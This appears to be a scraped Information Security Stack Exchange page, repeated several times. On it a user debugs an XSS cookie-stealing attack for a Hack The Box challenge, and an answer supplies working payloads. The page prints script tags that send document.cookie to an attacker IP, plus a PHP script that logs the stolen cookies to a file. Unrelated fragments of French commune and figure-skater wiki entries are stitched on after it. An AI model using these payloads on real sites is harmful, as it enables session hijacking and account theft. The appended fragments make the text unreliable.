XSS code not fetching back script












0














I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>

    <body>

    <script type="text/javascript">

        document.location='http://my_ip/write.php?c='+document.cookie;

    </script>

    </body>

</html>


And this is my php script that is supposed to be receiving the file.



<?php

header ('Location:https://intra.redcross.htb/');

        $cookies = $_GET["c"];

        $file = fopen('log.txt', 'a');

        fwrite($file, $cookies . "nn");

?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>





xss javascript







share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago
















0














I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>

    <body>

    <script type="text/javascript">

        document.location='http://my_ip/write.php?c='+document.cookie;

    </script>

    </body>

</html>


And this is my php script that is supposed to be receiving the file.



<?php

header ('Location:https://intra.redcross.htb/');

        $cookies = $_GET["c"];

        $file = fopen('log.txt', 'a');

        fwrite($file, $cookies . "nn");

?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>





xss javascript







share|improve this question
























  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago














0












0








0







I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>

    <body>

    <script type="text/javascript">

        document.location='http://my_ip/write.php?c='+document.cookie;

    </script>

    </body>

</html>


And this is my php script that is supposed to be receiving the file.



<?php

header ('Location:https://intra.redcross.htb/');

        $cookies = $_GET["c"];

        $file = fopen('log.txt', 'a');

        fwrite($file, $cookies . "nn");

?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>





xss javascript







share|improve this question















I am doing a XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS and so far I have got the below line to successfully call back to a python server on my box that is hosting a malicious script embedded in an html file.



The issue I have is that after the initial call from the top fetch the index.html the malicious script which should be called from the html file is not getting called.



Maybe my understanding of this attack is wrong but I thought I should see first the call for the html file and then a call by the malicious JS.



The application is using HTTPS but my python server is HTTP.



Is my implementation wrong or my understanding of this attack vector?



<script src="http://My_ip/index.html"></script>


I'm trying to then fetch this html file containing a remote malicious script...



<html>

    <body>

    <script type="text/javascript">

        document.location='http://my_ip/write.php?c='+document.cookie;

    </script>

    </body>

</html>


And this is my php script that is supposed to be receiving the file.



<?php

header ('Location:https://intra.redcross.htb/');

        $cookies = $_GET["c"];

        $file = fopen('log.txt', 'a');

        fwrite($file, $cookies . "nn");

?>


The idea of the attack is that I run the first piece in the script tags, which fetches the html file which finally send the call with the (hopefully) admin cookie to my server and the php script to be written to a file.



I did also try this as the XSS payload but I only got the callback and no cookie data.



<script src='http://my_ip/write.php?c='+document.cookie;</script>





xss javascript




xss javascript






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited 5 hours ago

























asked 7 hours ago









Rich C

1115




1115












  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago


















  • Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
    – tim
    6 hours ago










  • @tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
    – Rich C
    5 hours ago
















Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
– tim
6 hours ago




Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
– tim
6 hours ago












@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
5 hours ago




@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before
– Rich C
5 hours ago










1 Answer
1






active

oldest

votes


















5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 

     the JS file would then contain JS code (not HTML code) 

      and do something malicious

 -->

<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->

<script>

document.location='http://my_ip/write.php?c='+document.cookie;

</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago













Your Answer








StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "162"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 

     the JS file would then contain JS code (not HTML code) 

      and do something malicious

 -->

<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->

<script>

document.location='http://my_ip/write.php?c='+document.cookie;

</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago


















5














As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 

     the JS file would then contain JS code (not HTML code) 

      and do something malicious

 -->

<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->

<script>

document.location='http://my_ip/write.php?c='+document.cookie;

</script>





share|edit

















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago
















5












5








5






As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 

     the JS file would then contain JS code (not HTML code) 

      and do something malicious

 -->

<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->

<script>

document.location='http://my_ip/write.php?c='+document.cookie;

</script>





share|edit












As far as I can tell, there are two issues here:




  • modern browsers will not fetch mixed active content (ie JavaScript served via HTTP when the site is HTTPS).

  • you can't include a HTML file as a script (because it doesn't contain valid JavaScript code).


So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:



Fetch script:



<!-- note the .js instead of .html; 

     the JS file would then contain JS code (not HTML code) 

      and do something malicious

 -->

<script src="https://My_ip/index.js"></script>


Direct:



<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->

<script>

document.location='http://my_ip/write.php?c='+document.cookie;

</script>






share|edit












share|edit



share|edit










answered 5 hours ago









tim

23.1k66294




23.1k66294








  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago
















  • 1




    If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
    – EdOverflow
    5 hours ago










1




1




If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
– EdOverflow
5 hours ago






If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
– EdOverflow
5 hours ago




















draft saved

draft discarded




















































Thanks for contributing an answer to Information Security Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.





Some of your past answers have not been well-received, and you're in danger of being blocked from answering.


Please pay close attention to the following guidance:


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f200590%2fxss-code-not-fetching-back-script%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







-

Popular posts from this blog

Morgemoulin

Image
Morgemoulin — miejscowość i gmina — Państwo   Francja Region Grand Est Departament Moza Okręg Verdun Kod INSEE 55357 Powierzchnia 6,82 km² Populacja  (1990) • liczba ludności 75 • gęstość 11 os./km² Kod pocztowy 55400 Położenie na mapie Francji Morgemoulin 49°14′N   5°35′E / 49,233333   5,583333 Portal Francja Morgemoulin – miejscowość i gmina we Francji, w regionie Grand Est, w departamencie Moza. Według danych na rok 1990 gminę zamieszkiwało 75 osób, a gęstość zaludnienia wynosiła 11 osób/km² (wśród 2335 gmin Lotaryngii Morgemoulin plasuje się na 970. miejscu pod względem liczby ludności, natomiast pod względem powierzchni na miejscu 848.). Bibliografia | Francuski urząd statystyczny ( fr. ) . p   •   d   •   e Gminy okręgu Verdun Abaucourt-Hautecourt • Aincreville • Ambly-sur-Meuse • Amel-sur-l'Étang • Ancemont • Arrancy-sur-Crusne • Aubréville • Autré
Read more

Scott Moir

Image
Scott Moir Tessa Virtue i Scott Moir w 2016 r. Reprezentacja   Kanada Data i miejsce urodzenia 2 września 1987 London Wzrost 180 cm Konkurencja Pary taneczne Partner sportowy Tessa Virtue Trener Marie-France Dubreuil, Patrice Lauzon, Romain Haguenauer Poprzednio: Marina Zujewa, Oleg Epstein, Igor Szpilband, Johnny Johns, Carol Moir, Paul MacIntosh, Suzanne Killing Klub Montreal International School of Skating Poprzednio: Arctic Edge FSC Ilderton Skating Club Lokalizacja treningowa Montreal Poprzednio: Canton Kitchener Rekordy życiowe ISU przed sezonem 2018/2019 Nota łączna 206,07 Igrzyska Olimpijskie 2018 Taniec krótki 83,67 Igrzyska Olimpijskie 2018 Taniec dowolny 122,40 Igrzyska Olimpijskie 2018 Dorobek medalowy Reprezentacja   Kanada Igrzyska olimpijskie Złoto Vancouver 2010 pary taneczne Złoto Pjongczang 2018 pary taneczne Złoto Pjongczang 2018 drużynowo Srebro S
Read more

Souastre

Image
Souastre — miejscowość i gmina — Herb Państwo   Francja Region Hauts-de-France Departament Pas-de-Calais Okręg Arras Kod INSEE 62800 Powierzchnia 7,18 km² Populacja  (1990) • liczba ludności 352 • gęstość 49 os./km² Kod pocztowy 62111 Położenie na mapie Francji Souastre 50°09′N   2°34′E / 50,150000   2,566667 Portal Francja Souastre – miejscowość i gmina we Francji, w regionie Hauts-de-France, w departamencie Pas-de-Calais. Według danych na rok 1990 gminę zamieszkiwały 352 osoby, a gęstość zaludnienia wynosiła 49 osób/km² (wśród 1549 gmin regionu Nord-Pas-de-Calais Souastre plasuje się na 887. miejscu pod względem liczby ludności, natomiast pod względem powierzchni na miejscu 507.). Bibliografia | Francuski urząd statystyczny ( fr. ) . p   •   d   •   e Gminy okręgu Arras Ablain-Saint-Nazaire Ablainzevelle Acheville Achicourt Achiet-le-Grand Achiet-le-Pe
Read more